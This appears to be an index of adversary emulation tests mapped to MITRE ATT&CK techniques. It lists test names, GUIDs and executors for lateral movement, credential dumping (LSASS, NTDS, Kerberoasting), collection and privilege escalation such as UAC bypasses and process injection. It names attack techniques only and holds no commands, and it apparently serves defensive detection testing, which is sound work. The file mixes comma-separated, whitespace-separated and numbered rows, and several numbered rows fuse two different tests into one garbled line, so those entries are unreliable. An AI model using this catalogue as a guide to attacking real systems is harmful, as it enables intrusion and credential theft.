lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1021.001,Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,2,RDP to Server,7382a43e-f19c-46be-8f09-5c63af7d3e2b,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,4,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
credential-access T1558.004 AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
credential-access T1558.004 AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
credential-access T1003.005 Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
credential-access T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
credential-access T1555.003 Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
credential-access T1555.003 Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
credential-access T1555.003 Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
credential-access T1555.003 Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
credential-access T1555.003 Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
credential-access T1003.006 DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
credential-access T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
credential-access T1558.001 Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
credential-access T1558.001 Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
credential-access T1552.006 Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
credential-access T1552.006 Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
credential-access T1558.003 Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
credential-access T1558.003 Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
credential-access T1558.003 Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
credential-access T1558.003 Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
credential-access T1558.003 Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
credential-access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
credential-access T1003.001 LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
credential-access T1003.001 LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
credential-access T1003.001 LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
credential-access T1003.001 LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
credential-access T1003.001 LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
credential-access T1003.001 LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
credential-access T1003.001 LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
credential-access T1003.001 LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
credential-access T1003.001 LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
credential-access T1003.001 LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
credential-access T1003.001 LSASS Memory 11 Dump LSASS with .Net 5 createdump.exe 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
credential-access T1003.001 LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
credential-access T1003.003 NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
credential-access T1003.003 NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
credential-access T1003.003 NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
credential-access T1003.003 NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
credential-access T1003.003 NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
credential-access T1003.003 NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
credential-access T1003.003 NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
credential-access T1003.003 NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
credential-access T1110.002 Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
credential-access T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
credential-access T1110.001 Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
credential-access T1110.001 Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
credential-access T1110.003 Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
credential-access T1110.003 Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
credential-access T1552.004 Private Keys 6 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
credential-access T1552.004 Private Keys 7 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
credential-access T1003.002 Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
credential-access T1003.002 Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 powershell
credential-access T1003.002 Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
credential-access T1558.002 Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
credential-access T1555.004 Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
collection T1560.001 Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
collection T1560.001 Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
collection T1560.001 Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
collection T1560.001 Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
collection T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administive share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administive share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
collection T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
collection T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
collection T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
collection T1074.001 Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
collection T1074.001 Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
collection T1114.001 Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
collection T1113 Screen Capture 6 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
2 privilege-escalation T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
privilege-escalation T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
3 privilege-escalation T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
4 privilege-escalation T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
5 privilege-escalation T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
6 privilege-escalation T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
7 privilege-escalation T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
8 privilege-escalation T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
9 privilege-escalation T1547.002 T1548.002 Authentication Package Bypass User Access Control 1 Authentication Package Bypass UAC using Event Viewer (cmd) be2590e8-4ac3-47ac-b4b5-945820f2fbe9 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 powershell command_prompt
10 privilege-escalation T1547 T1548.002 Boot or Logon Autostart Execution Bypass User Access Control 1 2 Add a driver Bypass UAC using Event Viewer (PowerShell) cb01b3da-b0e7-4e24-bf6d-de5223526785 a6ce9acf-842a-4af6-8f79-539be7608e2b command_prompt powershell
11 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 1 3 Bypass UAC using Event Viewer (cmd) Bypass UAC using Fodhelper 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
12 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 2 4 Bypass UAC using Event Viewer (PowerShell) Bypass UAC using Fodhelper - PowerShell a6ce9acf-842a-4af6-8f79-539be7608e2b 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
13 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 3 5 Bypass UAC using Fodhelper Bypass UAC using ComputerDefaults (PowerShell) 58f641ea-12e3-499a-b684-44dee46bd182 3c51abf2-44bf-42d8-9111-dc96ff66750f command_prompt powershell
14 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 4 6 Bypass UAC using Fodhelper - PowerShell Bypass UAC by Mocking Trusted Directories 3f627297-6c38-4e7d-a278-fc2563eaaeaa f7a35090-6f7f-4f64-bb47-d657bf5b10c1 powershell command_prompt
15 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 5 7 Bypass UAC using ComputerDefaults (PowerShell) Bypass UAC using sdclt DelegateExecute 3c51abf2-44bf-42d8-9111-dc96ff66750f 3be891eb-4608-4173-87e8-78b494c029b7 powershell
privilege-escalation T1548.002 Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
privilege-escalation T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
privilege-escalation T1548.002 Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
privilege-escalation T1548.002 Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
16 privilege-escalation T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
17 privilege-escalation T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
18 privilege-escalation T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
19 privilege-escalation T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
privilege-escalation T1546.015 Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
privilege-escalation T1546.015 Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
20 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
21 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
22 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
privilege-escalation T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
privilege-escalation T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
23 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
24 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
privilege-escalation T1078.003 Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
25 privilege-escalation T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
26 privilege-escalation T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
27 privilege-escalation T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
33 privilege-escalation T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
34 privilege-escalation T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
35 privilege-escalation T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
36 privilege-escalation T1055.012 T1055 Process Hollowing Process Injection 2 1 RunPE via VBA Process Injection via mavinject.exe 3ad4a037-1598-4136-837c-4027e4fa319b 74496461-11a1-4982-b439-4d87a550d254 powershell
privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
37 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
38 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
39 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
40 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
41 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
42 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
privilege-escalation T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
privilege-escalation T1547.001 Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
privilege-escalation T1547.001 Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
privilege-escalation T1134.005 SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
43 privilege-escalation T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
44 privilege-escalation T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
45 privilege-escalation T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
46 privilege-escalation T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
privilege-escalation T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
privilege-escalation T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
privilege-escalation T1053.005 Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
47 privilege-escalation T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
48 privilege-escalation T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
49 privilege-escalation T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
privilege-escalation T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
50 privilege-escalation T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
51 privilege-escalation T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
52 privilege-escalation T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
55 privilege-escalation T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
56 privilege-escalation T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
